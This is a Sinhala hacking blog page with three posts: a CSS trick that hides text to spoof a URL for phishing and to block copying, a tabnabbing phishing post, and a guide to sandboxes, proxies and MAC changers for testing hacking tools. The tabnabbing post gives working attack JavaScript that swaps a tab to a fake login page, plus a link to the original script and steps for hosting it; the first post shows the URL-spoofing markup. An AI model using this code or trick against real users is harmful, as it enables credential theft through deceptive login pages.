ව<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>ශයෙ<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>න්ම විස්<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>තර කර<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>නු ල<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>බන්<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>නේ තො<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>රතු<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>රැ සන්<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>නිව්<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>දනයට යෙදාගන්නා ඩිජිටල් <span class="z">ෆ්ග්ස්ල්ක්</span>තාක්<span class="z">ෆ්ග්ස්ල්ක්</span>ෂණ විධි <span class="z">ෆ්ග්ස්ල්ක්</span>ක්‍රමundefined සන්නිෙව්දන ටො<span class="z">ෆ්ග්ස්ල්ක්</span>කෝල,සම්ෙපේෂණය උපක්‍රම,සන්නිෙව්දන උපකරණ, මාධ්ය සන්නිෙව්දනය) ස<span class="z">ෆ්ග්ස්ල්ක්</span>හ තොර<span class="z">ෆ්ග්ස්ල්ක්</span>තුරැ ගබ<span class="z">ෆ්ග්ස්ල්ක්</span>ඩා කිරි<span class="z">ෆ්ග්ස්ල්ක්</span>ම සහ සැක<span class="z">ෆ්ග්ස්ල්ක්</span>සුම් undefinedගණන<span class="z">ෆ්ග්ස්ල්ක්</span>ය කිරී<span class="z">ෆ්ග්ස්ල්ක්</span>ම,දත්<span class="z">ෆ්ග්ස්ල්ක්</span>ත ගබ<span class="z">ෆ්ග්ස්ල්ක්</span>ඩා කිරි<span class="z">ෆ්ග්ස්ල්ක්</span>ම)උ<span class="z">ෆ්ග්ස්ල්ක්</span>පක්‍ර<span class="z">ෆ්ග්ස්ල්ක්</span>මය<span class="z">ෆ්ග්ස්ල්ක්</span>න්<span class="z">ෆ්ග්ස්ල්ක්</span>ය.මෙ<span class="z">ෆ්ග්ස්ල්ක්</span>ම යෙ<span class="z">ෆ්ග්ස්ල්ක්</span>දු<span class="z">ෆ්ග්ස්ල්ක්</span>ම ජනප්‍රයතා<span class="z">ෆ්ග්ස්ල්ක්</span>වයක් අ<span class="z">ෆ්ග්ස්ල්ක්</span>ත්ප<span class="z">ෆ්ග්ස්ල්ක්</span>ත් ක<span class="z">ෆ්ග්ස්ල්ක්</span>රගැනීම<span class="z">ෆ්ග්ස්ල්ක්</span>ට පා<span class="z">ෆ්ග්ස්ල්ක්</span>ර්ෂ්වි<span class="z">ෆ්ග්ස්ල්ක්</span>ක හේ<span class="z">ෆ්ග්ස්ල්ක්</span>තුව<span class="z">ෆ්ග්ස්ල්ක්</span>ක් වූ<span class="z">ෆ්ග්ස්ල්ක්</span>යේ තො<span class="z">ෆ්ග්ස්ල්ක්</span>රතු<span class="z">ෆ්ග්ස්ල්ක්</span>රු තා<span class="z">ෆ්ග්ස්ල්ක්</span>ක්ෂ<span class="z">ෆ්ග්ස්ල්ක්</span>ණය සහ ටෙ<span class="z">ෆ්ග්ස්ල්ක්</span>ලිකො<span class="z">ෆ්ග්ස්ල්ක්</span>ම් තා<span class="z">ෆ්ග්ස්ල්ක්</span>ක්ෂ<span class="z">ෆ්ග්ස්ල්ක්</span>ණය සන්<span class="z">ෆ්ග්ස්ල්ක්</span>නිපාත<span class="z">ෆ්ග්ස්ල්ක්</span>න<span class="z">ෆ්ග්ස්ල්ක්</span>ය<span class="z">ෆ්ග්ස්ල්ක්</span>යි<span class="z">ෆ්ග්ස්ල්ක්</span></div>

ඉහත උදාහරනයේ කරලා තියන්නේ ඡේදය අතර z class එක ගොඩ සැරයක් යොදාගෙන තියනවා .

 * කොහොමද phishing වලට මේ ක්‍රමය යොදාගන්නේ කියලා .

දැන් ඔය phishing වලදි බොහෝ අය කියන්නේ තමන්ම , ඕනෙම වෙබ් අඩවියක URL එක copy කරලා paste කලොත් එල කියලනේ . ඒ වුනත් පහත් Demo එක බලන්නකෝ මොකද වෙන්නේ කියලා . ඔකේ තියන address එක කොපි කරලා address bar එකේ paste කරලා බලන්නකෝ garupale.

Demo :

  http://spam.virus.hacker.facebook.com
දැක්කනේ මොකද වුනේ කියලා , ඒක නිසා Web Address එක්ක කටයුතු කරන කොට.

කේතය :
<div>
<style>
.z{
  float:right;
  font-size:.001px;
  color:transparent;
  display:inline-block;
  width:0px;
  }
  
</style>
<blockquote>
&nbsp; http://<span class="z">spam.virus.hacker.</span>facebook.com</blockquote>
</div>

හරි මම දැන් ඔය විඩියෝ එකේ තියන ඒවා ඔක්කොම කියුවනේ , මට මතක් වුන තව වැදගත් කියලා හිතන තැන් දෙකක් පෙන්වන්නම්කෝ මෙම ක්‍රමය භාවිතා කරන .

* කොහොමද picture එකක් බේරගන්න මේ ක්‍රමය යොදාගන්නේ කියලා.
හිතන්න අපේ වෙබ් අඩවියේ තිබෙන පින්තුර කාටවත් කොපි කරගන්න බැරිවෙන විදිහට හදාගන්න ඔනේ කියලා . එහෙනම් ඒක කර්ගන්නත් මේ CSS එක භාවිතා කරන්න පුලුවන් . පහත demo එක බලන්නකෝ .පුලුවන්නම් ඒක කොපි කරගන්න බලන්න (*source code එක බලලා URL එක ගන්නේ නැතුව) busuk.

Demo :




කේතය :
<div id="images1" style="overflow: hidden; position: absolute; width: 142px; height: 200px; z-index: 0;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdpVu9zUzLeRhKzltKKHO68RFteEfddJSkkEmD4E1kQqlP__9t5y3MGpKA9G9ZQSaL_pIdFkemNrWQJpFpAnlVuKeo_g9cAN6B0RhSE-WbeRqlUPm-VoUkeHQc_qbG8B9wuXy5Wg1s5tw/s200/flower-dewlance.gif" border="0" alt="" width="142" height="200" /></div>
<div id="images2" style="overflow: hidden; position: absolute; width: 145px; height: 202px; z-index: 1;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrGSH-Wd2SBwFscl16ycj0WIeEzi9jnpRixOaQdvifGUuyv-lqKq8QrhOLHcyNryv7UVx8Nas9vVNH7Gmdls9pYkEkRfznnFA1Bl2V7ochAShwvzQTl086YzRX00TxxPulePZCyAjTv40/s320/1pixel-transparentimage.gif" border="0" alt="" width="1" height="1" /></div>
මෙතැන කරලා තියන්නේ අපිට ආරක්ෂා කීරිමට අවශය පින්තුරය , 1px*1px විනිවිද පෙනෙන පින්තුරයක් මඟින් ආවරණය කර තිබේ (අපේ ආරක්ෂා කීරිමට අවශය පින්තුරයට උඩින් 1px*1px විනිවිද පෙනෙන පින්තුරය දමා තිබේ ). මේක ගොඩක් වටිනවා වගේම 1px*1px විනිවිද පෙනෙන පින්තුරයට වැයවනුයේ 43 bytes වැනි කුඩා ප්‍රමාණයක් නිසා bandwidth එක ගැන බය විමට දෙයක් නැත  sengihnampakgigi .

* කොහොමද තමන්ගේ text බේරගන්න මේ ක්‍රමය යොදාගන්නේ කියලා.

ඉහත භාවිතා කල ක්‍රමයම අපිට අපේ text බේරාගැනිමටත් භාවිතා කල හැක . ඒ කියන්නේ මෙවර picture එකක් වෙනුවට තියන්නේ text තිබෙන අතර  අප 1px*1px විනිවිද පෙනෙන පින්තුරය මඟින් එම text සියල්ලම වසා දමනු ලැබේ . blur

Demo :


කේතය :
<div id="images1" style="overflow: hidden; position: absolute; width: 142px; height: 200px; z-index: 0;"><b><h2>Copy me if you can ?? ; පුලුවන් නම් මාව කොපි කරන්නකෝ ??? </h2></b></div>
<div id="images2" style="overflow: hidden; position: absolute; width: 145px; height: 202px; z-index: 1;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrGSH-Wd2SBwFscl16ycj0WIeEzi9jnpRixOaQdvifGUuyv-lqKq8QrhOLHcyNryv7UVx8Nas9vVNH7Gmdls9pYkEkRfznnFA1Bl2V7ochAShwvzQTl086YzRX00TxxPulePZCyAjTv40/s320/1pixel-transparentimage.gif" border="0" alt="" width="1" height="1" /></div>

මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!!garupale

Source : blog.dewlance.com , azarask.in
ඉතිරිය කියවන්න .....>>

 

Tabnabbing - Phishing කලාවේ අලුත්ම පෙරලිය (*තවත් එක් හැකින් ක්‍රමයක්)

7

Share/Bookmark

හෙට පෝය නිසා අද ටිකක් රිලැක්ස් , හෙට උදේ ක්ලාස් , රෑට දන්සලේ වැඩ ...... garupaleහරි හරි මම ආව කාරනය අද කියන්නම්කෝ . මම ඔය හැකින් ගැන නිකන් හොයන වෙලාවට යන එක වෙබ් අඩවියක් තමා techotips.blogspot.com කියන්නේ . අද ගියහම තිබ්බා tabnabbing කියලා article එකක් , මාත් බැලුවා මොකක්ද මේ අලුත් නම කියලා . බැලින්නම් අලුත්ම phishing ක්‍රරමය තමා tabnabbing . මෙකෙන් මුලිකවම කරන්නේ අපි web browser එක tab එකක් දාලා වෙබ් අඩවියකට ගියා කියමුකෝ , හිතන්න අපි ගිය වෙබ් අඩ්වියේ මෙම phishing එක සිදුවෙන script එකක් ඇතුලත් වෙනවා කියලා . දැන් අර මම open කරපු මුල්tab එක තියලා , තව tab කිහිපයක් උපයෝගි කරගෙන මගේ වැඩටික කරනවා . නමුත් මෙම වෙලාවේදි අර script එක ඇතුලත් වෙලා තිබ්බ වෙබ් අඩවිය වෙනත් වෙබ් අඩවියකට (හිතන්නකෝ බොරු yahoo , gmail , facebook login page එකකට කියලා) යනවා . නමුත් මම දන්නවා මම ඒ වෙලාවේ ඒ tab එක ඔපන් කරලා තිබ්බේ ඒක නිසා මම එහි URL එක බල බ්ල ඉන්නේ නෑ , කෙලින්ම මගේ අදාල විස්තර ටික ඇඳලා දානවා hah. එතකොට තමා අපිට කෙලවෙන්නේ . මට ඔය පැහැදිලි කිරිම් කරන්න හරි අමරුයි අප්පා , ඔයාලත පහත විඩියෝ දාලා බලන්නකෝ එතකොට තේරෙයි . garupale



දැන් තේරෙනවා නේද වැඩේ කොහොමද වෙන්නේ කියලා . මම source code එකත් බැලුවා , වැඩේ නම් සරල logic එකකට තමා වෙන්නේ . මට මෙතැන source code එක දාන්න බැ , virus guard වලින් අල්ලනවා virus කියලා , ඇත්ත කියුවොත් මේකේ විරුස් එකක් නෑ , වෙන්නේ අර ටැබ් ගොඩක් open වෙලා තියන වෙලාවට වෙබ් අඩ්විය වෙනස්වීම පමණි .මෙක හොයාගෙන තියන්නේ ඔය mac එක හොයාගත්ත මහත්තයාගේ පුතා (Aza Raskin) කියලා තමයි සඳහන් වෙන්නේ . ඔයාලත් එයාගේ බ්ලොග් එකට ගිහිල්ලා බලන්නකෝ .(http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ , ආ කියන්න අමතක වුනා මේ අඩ්වියට යන කොට මෙයා මේ බ්ලොග් එකේ script එක දාලා තියනවා අපිට demo එකක් වගේ පෙන්නන්න .ඒ වෙලාවට virus gurad එකෙන් අල්ලයි virus කියලා , ඒකට බයවෙන්න එපා හොඳේ !!).


ම්මත් මේ demo එකක් හැදුවා , ඒක ටිකකට කලින් delete කරලා ( free hosting නේ ) . ඔයාලට ඔයාලගේ වෙබ් අඩවියකට මෙය දාන්න ඕනෙම නම් කරන්න තියන්නේ මෙහි .js (javascript file එක) ඔයාලගේ web hosting service එකකට upoload කරලා , වෙබ් අඩ්වියේ <script>
tag එක මඟින් javascript එක කෝල් කිරිම පමනයි . garupale



script එක භාගත කරගන්න : http://bit.ly/da4qVT (http://www.azarask.in/projects/bgattack.js)

උදා : (දැනට මෙම script එක මෙහි නිර්මාතෘගේ වෙබ් අඩවියේ තියන නිසා මම මෙම script එක එහි සිට කොල් කරනවා) . පහත කේතය text file එකක දාලා " anyname.html" ලෙස save කරලා ඕක tab කිහිපයක් ඕපන් කරලා බලන්නකෝ . yoursite.com/phishing.javascript.js එක javascript එක තියන තැනට වෙනස් කරන්න . )

කේතය :


<html><head> </head><body><h2> Testing tabnabbing </h2><script type="text/javascript" src="yoursite.com/phishing.javascript.js"></script> </body></html>

තව ඕක ක්‍රමය වැඩිදියුණු කරලා , ඒ කියන්නේ tabnabbing සහ iframe භාවිතා කරලා ගේම දෙන විඩියෝ ඒකකුත් දැක්කා youtube එකේ .ඕං ඒකත පහත දාලා ඇති බලන්නකෝ , බලලා පහලින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!



විඩියෝ භාවිතා වු කේතය (tabnabbing & iframe) :

<html><head><title></title></head><style type="text/css">html {overflow: auto;}html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}</style><body> <script type="text/javascript">//----------Set Script Options--------------var REAL_PAGE_URL = "http://google.com/"; //This is the "Real" page that is shown when the user first views this pagevar REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"var FAKE_PAGE_URL = "http://www.hackyeah.com"; //Set this to the url of the fake pagevar FAKE_PAGE_TITLE = "HackYeah"; //This sets the title of the fake pagevar REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.var FAKE_FAVICON = "http://www.hackyeah.com/favicon.ico"; //Set's the fake favicon.var TIME_TO_SWITCH_IE = "4000"; //Time before switch in IE (after tab changes).var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching (does not account for tab focus) .//---------------End Options-----------------var TIMER = null;var SWITCHED = "false"; //Find Browser Typevar BROWSER_TYPE = "";if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){ BROWSER_TYPE = "Internet Explorer";}//Set REAL_PAGE_TITLEdocument.title=REAL_PAGE_TITLE; //Set FAVICONif(REAL_FAVICON){ var link = document.createElement('link'); link.type = 'image/x-icon'; link.rel = 'shortcut icon'; link.href = REAL_FAVICON; document.getElementsByTagName('head')[0].appendChild(link);} //Create our iframe (tabnab)var el_tabnab = document.createElement("iframe");el_tabnab.id="tabnab";el_tabnab.name="tabnab";document.body.appendChild(el_tabnab);el_tabnab.setAttribute('src', REAL_PAGE_URL); //Focus on the iframe (just in case the user doesn't click on it)el_tabnab.focus(); //Wait to nab the tab!if(BROWSER_TYPE=="Internet Explorer"){ //The tested versions of IE blur the iframe on tab change el_tabnab.onblur = function(){ TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE); } el_tabnab.onfocus= function(){ if(TIMER) clearTimeout(TIMER); }} else { setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);} function TabNabIt(){ if(SWITCHED == "false"){ //Redirect the iframe to FAKE_PAGE_URL el_tabnab.src=FAKE_PAGE_URL; //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;  //Change the favicon -- This doesn't seem to work in IE if(BROWSER_TYPE != "Internet Explorer"){ var links = document.getElementsByTagName("head")[0].getElementsByTagName("link"); for (var i=0; i<links.length; i++) { var looplink = links[i]; if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") { document.getElementsByTagName("head")[0].removeChild(looplink); } } var link = document.createElement("link"); link.type = "image/x-icon"; link.rel = "shortcut icon"; link.href = FAKE_FAVICON; document.getElementsByTagName("head")[0].appendChild(link); } }}</script> </body></html>

මේකෙන් බේරෙන්න තියන හොදම ක්‍රමය තමා browser එකේ password manager එකක් දාගෙන භාවිතා කිරිම . ඔය Secure login (https://addons.mozilla.org/en-US/firefox/addon/4429/)වගේ හොඳයි . garupale
ඉතිරිය කියවන්න .....>>

 

ගේම දිමට පෙර ආරක්ශාව - තමන්ගේ මැසිම virus , trojans ටෙස්ට් කරන්න සදාගන්නේ කෙසේද ?

11

Share/Bookmark
අද මට මාර වැඩක්නේ වුනේ , අද මගේ fb එකේ හොඳ බැනලා එවපු msg ගොඩයි , මම බැලුවා මේ මොකද යකෝ මේ කියලා garupale. බැලින්නම් මගේ ඊට ඉස්සෙල්ලා ලව් ස්ටෝරි කොලෙක්ශන් පොස්ට් එක මාර විදිහට හිට් වෙලා නිසා , සයිට් එකට අලුත් කට්ටියක් හිට් වෙලා , සෙට් වෙලා !! ; පස්සේ අලුතෙන් හිට් වුන කට්ටියගෙන්ද දන්නේ නෑ මේකේ හැකින් ගැන තියන ටුල්ස් එහෙම නිකම්ම මැසිමේ ටෙස්ට් කරලා , අර කියන ටුල්ස් රන් කරලා වෙන ඒවා ට්‍රයි කරන්න ගිහිල්ලා මැසිම් වලට virus , trojan දාගෙන අනාගෙන මට හොඳවයින් බැනලා !!!; අනේ අසරණ මම ............ garupale( * මම ලියලා තියන, කියන හැම ටුල් එකක්ම මම virtual pc එකක තමා ටෙස්ට්න් දාන්නේ , ඉතින් මට මේක හැම පොස්ට් එකකම ලියන්නත් බැහැ මතක් කරකර , අනික මේක ගැන මට මුලින්ම කියන්න මතක වුනා ; සොරි හොඳේ !!! soal ).



ඉතින් අපෝ මට තවත්අයගෙන් බැනුම් අහන්න බැරි නිසා මම තව හැකින් ලියන්න ඉස්සෙල්ලා අනිවා හිතුව මේ ගැන ලියන්න. මුලිකවම මම ගන්න හැම tool එකක්ම ටෙස්ට් කරන්න යොදාගන්නේ virtual pc එකක් හෝ deep freeze වල තමා . මේ සබ්ජේක්ට් එකට අලුත් අයටත් දැනගන්න ලෙහෙසි වෙන්නත් එක්ක මම හිතුවා සරල ලිපියක් දාන්න , වැඩි වැල්වටාරන් නැතුව virus , trojans ටෙස්ට් කරන්න ඉස්සෙල්ලා තමන්ගේ මැසිම කොහොමද හදාගන්නේ කියලා . මුලිකවම මේකට අමුතු සුදානමක් ඕනේ නැ , මම මේ වගේ වැඩ වලට භාවිතා කරන tools කිහිපයක් පිලිබඳ පොඩි දැනුවත් කිරිමක් තමා මෙම ලිපියෙන් ඉදිරිපත් කරන්න බලාපොරොත්තු වෙන්නේ .

1 මුලිකවම වැඩිදෙනෙක් භාවිතා කරන tool එකක් තමා virtual pc එකක් කියලා කියන්නේ . මේකෙන් මුලිකවම කරන්නේ තමගේ පරිගනකය තුල කුමක් හෝ vitual pc support කරන මෘදුකාංගයක් හරහා virtual පරිගනකයක් තමන්ගේ පරිගනකයේ ධාවනය කිරිමයි . සරලව මෙහි ක්‍රියාකාරිත්වය ගැන කතාකරද්දි අපි virtual පරිගනකය තුල සිදු කරනු ලබන සියලුම ක්‍රියාකාරකම් virtual පරිගනකය තුල පමණක් සිදුවන අතර , මෙලෙස සිදු කරනු ලබන ක්‍රියාකරකම් වලින් සිදුවන සියලුම හානිකර බලපෑම් virtual පරිගනකයට පමනක් සිදුවේ . ඕනෑම vitual pc support කරන මෘදුකාංගයක guest os සහ host os ලෙස පිලිවෙලින් virtual පරිගනකයේ OS සහ තම ඇත්ත පරිගනකයේ OS එකට කියනු ලෑබේ . බොහෝ වෙලාවට viryual pc මෘදුකංග භාවිතා කරන්නේ එකම OS එක තුල OS කිහිපයක් (Multiple OS) ධාවනය කිරිම සඳහාය . මෙම සේවාව සපයන බොහෝ මෘදුකාංග වෙලදපොලේ තිබුනත් නොමිලේ , වැඩි ආරක්ශාවක් සහිතව වැඩේ කරගත හැකි මෘදුකාxගයක් ලෙස "Virtual box" හැඳින්විය හැක . මෙම මෘදුකාංගය ඔයාලට http://www.virtualbox.org/ හරහා භාගත කරගත හැක . මම විඩියෝ කට්ටක් කලා කොහොමද තමගේ පරිගනකයට virtual pc එක දාගෙන වැඩක් අල කරගන්නේ නැතුව කරගන්නේ කියලා garupale. මුලිකවම මේ විඩියෝ එකෙන් virtual pc එකේ Installation , Configuration , File Sharing & Networking යන කිහිපය ආවරනය වෙන්න තමා හදලා තියන්නේ .

Video Part 1



Video Part 2



2. ඊළඟ කිරිටොයියා තමා " Deep freeze " . මේක ඔයාලට http://www.faronics.com/en/DownloadEvaluationEditions.aspx භාගත කරගන්න පුලුවන් . Deep freeze මුලිකවම කරනු ලබන්නේ මුළු hard disk එකම freeze කරන අතර , එම වේලාවේදි අප සිදු කරනු ලබන සියලුම වෙනස්කම් virtual ලෙස පරිගනකට සිදු කරනු ලබන අතර පරිගනකය restart කිරිමෙන් පසු පරිගහනකයේ ඉහත කල සියලුම වෙනස්කම් සම්පුර්ණ්යෙන්ම නැතිවි නැවත යථාතත්වයට පත්වේ . hah

Deep freeze භාවිතා කිරිමේදි අප සැලකිළිමත් විය යුතු කරුණු කිහිපයක් පවතී . පළමු කරුණ නම් අපිට deep freeze control panel එකට යාමට අව්ශය නම් කලයුත්තේ system tray එකේ deep freeze icon එක ලඟට ගොස් "Shift' එක ඔබාගෙන left click එක double click කිරිම හෝ "CTRL+Shift+Alt+F6" ඔබන්න . ඊළඟ කරුණ නම් අපට permanently පරිගනකයට යම්කිසි වෙනස් කමක් සිදු කිරිමට අවශය නම් පලමුව deep freeze , boot thawed තත්වයට පත්කොට පරිගනකය restart කර අවශය වෙනස්කම් කරන්න . අනික් කරුන නම් deep freeze uninstall කරන්න ඕනේ නම් මුලින්ම deep freeze , boot thawed තත්වයට පත්කොට පරිගනකය restart කරන්න , ඉන්පසු deep freeze setup එක ධාවනය කර uninstall කරන්න . පහත පිංතුරයත් පොඩ්ඩක් බලන්න , එහි තිබෙනව deep freeze වල එක එක status කොහොමද පෙන්වන්නේ කියලා . ඊලග පහත් විඩියෝ කට්ටත් බලන්නකෝ කොහොම්ද deep freeze install කරගෙන අදාල වැඩකගන්නේ කියලා .







ආ කියන්න අමතක වුණා Deep freeze වුනත් හරියටම භාවිතා නොකලොත් හ්Aක් කරන්න පුලුවන් . http://www.youtube.com/watch?v=lX4LhBbSa-U ඔය විඩියෝ කට්ටත් බලන්නකෝ !! , blacktrack එකේ tools කිහිපයක් යොදාගෙන ගේම දෙන හැටි !! garupale

3. ඊලඟ එක තමා " Sandboxie " . ඔයාලට මේක http://www.sandboxie.com/ භාගත කරගන්න පුලුවන් . sandboxie එකෙන් මුලිකවම කරන්නේ තමගේ පරිගනකය තුළ virtual memory එකක් සාදා , අප Sandboxie හරහා සිදුකරනු ලබන සියලුම ක්‍රියාකාරකම් මෙම virtual memory එක තුළ සිදුවන අතර, මෙමඟින් අප Sandboxie තුල ධාවනය කරනු ලබන මෘදුකාංග , භාගත කරනු ලබන ගොනු ඈතුළු කරනු ලබන් සියලුම ක්‍රියාකාරකම් අපට නිරික්ෂණය කර එහි හැසිරිමේ රටාවන් (Diagnostic results) හඳුනාගැනිමට වැනි කටයුතු සිදු කල හැකිය . මෙහි අනෙක් වාසිය නම් අප virtual memory එක කරනු ලබන සියලුම ක්‍රියාකාරකම් කරන නිසා පරිගනකයට කිසිදු හානියක් නොවිමත් , අප Sandboxie තුල සිදුකල සියලුම ක්‍රියාකාරකම් අපට අව්ශය නම් එවෙලෙහිම delete කිරිමට ඇති හැකියාවත්ය . garupale



ඔන්න මම sandboxie ගැන තියන හොඳ වීඩියෝ කටු 3 කුත් මෙතැන දාන්නම්කෝ , හැබැයි මේ 3 ත මම මෙතැන embed කරන්නේ නෑ , මොකද සයිට් එකේ page එක ලෝඩ් වෙන්න අලි වෙලාවක් යයි මේ 3 න දැම්මොත් මෙතැන දැම්මොත් . garupale

Video Part 1 : http://www.youtube.com/watch?v=GueXMq-Vyi8
Video Part 2 : http://www.youtube.com/watch?v=2IbwhE-r8_k
Video Part 3 : http://www.youtube.com/watch?v=4XBbC81bZx4

4 . අන්තිමට කියන්න තියන්නේ ඉතින් proxy භාවිතය සහ තමන්ගේ පරිගනකයේ mac address එක වෙනස් කරන හැටි තමා ඉතින් . Proxy ගැන කතාකරන්න මම browser එක විදිහට Firefox ගන්නම්කෝ . අනේ අපොයි මම කියන්න යන්නේ නෑ proxy එකක් කියන්නේ මොකක්ද , අරකද මේකද කියලා . සරලව කියන්නම් කොහොම්ද proxy එක හදාගෙන භාවිතාකරන්නේ කියලා . Firefox වලනම් ඔයාට tools -> options -> Advanced -> Network වල Settings කියන button එක click කරලා proxy settings ගන්න පුලුවන්.

ඕකේදි ඔයාලට Manual proxy Configuration Option එක පාවිච්චි කරලා proxy server එකක Ip address එක හා අදාල port එක අරගෙන proxy service එක භාවිතා කරන්න පුලුවන්. proxy servers වල Ip addresses සහ අදාල ports list කරලා පවත්වාගෙන යන වෙබ් අඩවි ඕනේ තරම් තියනවා , ඒවායින්

http://www.hidemyass.com/proxy-list/
http://nntime.com/proxy-ip-01.htm

හොඳ කොලෙක්ශන් එකක් තියන වෙබ් අඩවි ලෙස ගත හැක . තව වෙබ් අඩවි තියනවා proxy service එක සපයන වෙබ් අඩවි වල කොලෙක්සන් තියාගෙන ඉන්න වෙබ් අඩවි . ගුගල් දෙයියන්ගෙන් ඇහුවොත් දෙයි නාන්නම . එවැනි ගුණාත්මක වෙබ් අඩවි පිලිබද හොඳ කොලෙක්ශන් එකක් තියන වෙබ් අඩවියක් ලෙස http://www.proxy4free.com/list/webproxy1.html ගන්න පුලුවන් . ආ අනික තමා ඔයාලට ඔය proxy configuration ස්වයංක්‍රියවම සදාගෙන service එක ලබාදෙන වෙබ් අඩවිත් තියනවා . එම වෙබ් අඩවි වල අදාල service එක ලබාදෙන URL එක Automatic Proxy Configuration URL එකට දී අදාල වැඩේ කරගත හැක. උදාහරනයක් ලෙස http://tools.rosinstrument.com/cgi-bin/proxy.pac URL එක දිලා බලන්නකෝ !!
තව ඔයාලට වැඩි වැඩ කෑලි ඕනේම නම් (ඔය විනාඩි කියෙන් කීයට හරි proxy එක මාරු වෙන්න ඕනේ වගේ වැඩ කරගන්න ඕනේම නම්) Froxy proxy ( http://foxyproxy.mozdev.org/downloads.html ) වගේ addon එකක් වුනත් වගේ දාගෙන ගේම දෙන්න පුලුවන්. soal

ඔයාලට ඕනේම නම් proxy script එකක් භාගත කරගෙන එය වෙනම free hosting සපයන වෙබ් අඩවියකට දාගෙන proxy service එකක් run කරන්නත් පුලුවන් . ඔය පහත විඩියෝ කට්ටත් බලන්නකෝ එතකොට තේරේවී . proxy script ලෙස glype proxy (http://www.glype.com/) . PHP proxy (http://www.glype.com/) , phpMyProxy (http://www.phpmyproxy.com/) , CGI proxy (http://www.jmarshall.com/tools/cgiproxy/) , zelune Proxy (http://www.brothersoft.com/zelune-proxy-script-59008.html) ගතහැක . Free web hosting services "http://www.free-webhosts.com/webhosting-01.php" සොයාගත හැක.



මෙම් විඩියෝ සදහා භාවිතා කල වෙබ් අඩවි :
http://sourceforge.net/projects/poxy
http://www.000webhost.com/
http://www.python.org/download/releases/2.6.4/#download
http://code.google.com/appengine/downloads.html#Google_App_Engine_SDK_for_Python
http://www.tinkernut.com/downloads/tinkernut_proxy.zip
https://appengine.google.com/ වේ .

ආ තව පොඩ්ඩෙන් කියන්න අම්තක වෙනවා , ඔයාලට ඔය proxy service එක ලබාදෙන මෘදුකාංගත් තියන්වානේ , "Hide my IP " වගේ . ඒක ඔයාලට http://www.hide-my-ip.com/download.shtml භාගත කරගන්න පුලුවන් .



අනේ මට මේක ලියන්න ගිය කම්මැලිකම garupale !!! ඕං ඉත්න් අපට අවසාන වශයෙන් පරිගනකයේ mac address එක වෙනස් කිරිම්ට ජංජාලයේ ඕනේ තරම් tools තියනවා . එකක් කියනවා නම් http://www.technitium.com/tmac/index.html ගිහිල්ලා බාගෙනම දාලා බලන්නකෝ !! garupale





*මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale
ඉතිරිය කියවන්න .....>>

 

Subscribe to: Posts (Atom)
Related Posts with Thumbnails